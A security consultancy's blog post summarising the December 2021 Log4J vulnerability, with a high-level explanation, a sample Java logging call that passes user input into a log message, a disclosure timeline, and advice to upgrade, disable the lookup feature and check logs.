Log4J Security Issue

December 15, 2021

This post is a quick summary around the Log4J security issues happening in December 2021. It includes a summary, a video, a PDF of slides we presented and extensive references.

The TL;DR is: update Log4J to 2.16.0 and keep watching for subsequent updates.

The 10,000 Foot View Summary of The Issue

Log4J is a widely used Java library.

It has a problem where if it is asked to process a malicious string, it will allow an attacker to run their own code on a targeted server. This can happen in both authenticated (where we know the user) and unauthenticated (anonymous) cases depending on the application.

This issue is being actively probed and attacked.

The simplest fix is to patch. I expect further developments, so I recommend watching for additional updates.

The Rough Detail

Log4J is a logging library that is used in a wide array of applications. I probably used it in over half of the projects I’ve worked on in my career.

It is very normal for a developer to want to log something that a user enters. For example:

String user = getCurrentUser();
String document = request.getParameter("Document");
Logger logger = LogManager.getLogger(Thing.class.getName());
logger.debug("User {} requested document: {}", user, document);

That log statement where the user and document get put into a log statement is where the problem occurs. One clear problem is that these statements are basically everywhere in code and it would be nearly impossible to audit all of them.

The fix is basically to use a version of Log4J that doesn’t do the magic on the malicious string by default. Alternatives are to tell an older version you don’t want that feature. Or in extreme cases to rip the offending class right out of the log4j library.

There are a variety of ways to scan for the issue, and to identify log4j libary versions locally. Even a simple approach of looking at dependencies could help.

Timeline

The vulnerability was disclosed to the Apache Log4J security team 11/24.

It was released to the public 12/10.

Patches 2.15.0 and 2.16.0 have been release since then.

I would look in log files from November forward for malicious activity as soon as possible.

A Video

I put together this 17 minute video overview that covers:

  • The issue
  • The payload
  • Fixes
  • Things you want to check
  • References

The Slides

If you want to read and navigate yourself, the slides are here.

References

We looked at a lot of sources as we navigated this issue. Here are some that we thought were helpful:

Share this article with colleagues

Matt Konda

Founder and CEO of Jemurai

Popular Posts

Ready to get started?

Build a comprehensive security program using our proven model.
© 2012-2024 Jemurai. All rights reserved.
linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram